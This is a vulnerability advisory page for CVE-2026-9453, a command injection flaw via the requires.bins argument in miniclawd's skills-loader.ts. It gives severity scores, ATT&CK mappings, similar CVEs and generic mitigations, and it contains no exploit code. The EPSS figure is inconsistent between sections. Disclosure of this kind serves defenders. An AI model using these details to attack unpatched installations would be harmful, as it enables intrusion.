Cyber Resilience

CVE-2026-9453

Medium

Published: 25 May 2026

Published
25 May 2026
Modified
26 May 2026
KEV Added
Patch
CVSS Score v4 5.5 CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
EPSS Score 0.0155 71.8th percentile
Risk Priority 12 60% EPSS · 20% KEV · 20% CVSS

Summary

CVE-2026-9453 is a medium-severity Injection (CWE-74) vulnerability. Its CVSS base score is 5.5 (Medium).

Operationally, exploitation aligns with the MITRE ATT&CK technique Exploit Public-Facing Application (T1190); ranked in the top 28.2% of CVEs by exploit likelihood; it is not currently listed in the CISA KEV catalog.

Deeper analysis

A vulnerability has been identified in FoundDream miniclawd up to commit 2d65665046e2222eeea76cafc8570ed546a8c125, specifically in the SkillsLoader component within the file /src/application/skills-loader.ts. Manipulation of the requires.bins argument allows command injection, classified under CWE-74 and CWE-77. The product follows a rolling release model, so no discrete version numbers are available for affected or patched builds. The issue was reported via GitHub but has received no response from maintainers.

The flaw can be exploited remotely by unauthenticated attackers who supply crafted input to the affected argument, resulting in execution of arbitrary commands with limited impacts on confidentiality, integrity, and availability. Public exploit code is already available, and the CVSS 4.0 score of 5.5 reflects network attack vector, low complexity, and no required privileges or user interaction.

Reference materials point to the project repository and an associated GitHub issue, but contain no details on patches or workarounds. The EPSS score remains flat at 0.0218 with no material increase observed after disclosure.

EU & UK References

Vulnerability details

A vulnerability was detected in FoundDream miniclawd up to 2d65665046e2222eeea76cafc8570ed546a8c125. This affects the function which of the file /src/application/skills-loader.ts of the component SkillsLoader. Performing a manipulation of the argument requires.bins results in command injection. The attack may be initiated remotely.…

more

The exploit is now public and may be used. This product uses a rolling release model to deliver continuous updates. As a result, specific version information for affected or updated releases is not available. The project was informed of the problem early through an issue report but has not responded yet.

CWE(s)

Related Threats

MITRE ATT&CK Enterprise TechniquesAI

T1190 Exploit Public-Facing Application Initial Access
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.
T1059 Command and Scripting Interpreter Execution
Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries.
Why these techniques?

Remote command injection in a public-facing application component directly enables T1190 exploitation and arbitrary OS command execution via T1059.

Confidence: HIGH · MITRE ATT&CK Enterprise v18.1

CVEs Like This One

CVE-2025-0328Shared CWE-74, CWE-77
CVE-2025-1845Shared CWE-74, CWE-77
CVE-2026-1687Shared CWE-74, CWE-77
CVE-2025-10962Shared CWE-74, CWE-77
CVE-2026-8344Shared CWE-74, CWE-77
CVE-2026-1066Shared CWE-74, CWE-77
CVE-2025-15132Shared CWE-74, CWE-77
CVE-2026-3066Shared CWE-74, CWE-77
CVE-2025-1947Shared CWE-74, CWE-77
CVE-2025-15133Shared CWE-74, CWE-77

Affected Assets

Mitigating Controls

Likely Mitigating Controls AI

Per-CVE control mapping for this CVE has not run yet; the list below is derived from the weakness types (CWEs) cited in the NVD entry.

addresses: CWE-74

Developer assessments and testing (including injection-focused techniques) identify improper neutralization of special elements, and the verifiable flaw remediation corrects them pre-deployment.

addresses: CWE-74

Identifies indicators of injection attacks (command, SQL, LDAP, etc.) via anomaly and attack monitoring.

References